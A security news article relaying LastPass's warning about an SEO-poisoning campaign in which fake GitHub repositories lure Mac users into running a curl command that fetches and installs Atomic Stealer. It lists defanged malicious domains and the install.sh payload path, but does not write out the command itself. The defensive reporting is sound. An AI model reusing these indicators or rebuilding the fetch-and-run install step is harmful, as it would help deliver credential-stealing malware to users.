LastPass Warns of New SEO Poisoning Attack Targeting Mac Users

The LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team has issued a warning about an ongoing infostealer campaign that specifically targets Mac users through fraudulent GitHub repositories. The campaign leverages Search Engine Optimization (SEO) poisoning to lure victims into downloading malicious payloads disguised as legitimate software.

The attackers are setting up fake GitHub repositories impersonating major tech companies, financial institutions, and even password managers like LastPass. These repositories appear in top search engine results due to aggressive SEO tactics.

LastPass explains, “Two GitHub pages impersonating LastPass were posted to GitHub by the user ‘modhopmduck476’ on 16 September. Both pages included links allegedly to ‘Install LastPass on MacBook’ that redirected to the same page.”

The fraudulent GitHub pages featured Mac-related keywords such as “MacOS,” “Mac,” and “Premium on MacBook” to improve their visibility and credibility in search results.

The campaign involves a multi-stage redirection flow designed to trick users into running malicious commands:

1. Victims click on fraudulent GitHub repositories masquerading as LastPass installers.
2. The repositories redirect them to hxxps://ahoastock825[.]github[.]io/.github/lastpass.
3. From there, they are redirected again to macprograms-pro[.]com/mac-git-2-download.html.
4. This site instructs users to run a CURL command in their Mac terminal that fetches a Base64-encoded URL.
5. The decoded URL (bonoud[.]com/get3/install.sh) delivers a payload labeled “Update” into the Temp directory.

Despite its innocent name, this “Update” file is actually Atomic Stealer (AMOS malware). The report confirms, “The Update payload is in fact Atomic stealer (aka AMOS malware). Atomic stealer has been available since at least April 2023. The malware has previously been associated with financially motivated cybercrime groups.”

Atomic Stealer is a notorious Mac-focused infostealer capable of exfiltrating:

• Passwords and authentication data
• Wallets and cryptocurrency information
• Browser-stored credentials
• System metadata

By using GitHub and SEO to distribute malware, attackers are cleverly exploiting the trust users place in well-known platforms and top-ranked search results.

LastPass confirms that “the fraudulent repositories redirected potential victims to a repository that downloads the Atomic infostealer malware. The threat actors are using Search Engine Optimization (SEO) to deliver links to their malicious sites at the top of search pages, including Bing and Google.”

The TIME team has already submitted takedown requests for the fraudulent GitHub pages, which are now inactive, but warns that similar impersonations will likely reappear. They stress the importance of verifying download sources and cross-checking software installers against official vendor sites.

Related Posts:

• Warning: LastPass Alerts Users to Phishing Scam Using Fake Support Reviews on Chrome Web Store
• LastPass details its data breach in 2022
• Mac Users Beware: Atomic Stealer Strikes Again
• Hackers attacks LastPass and steals source code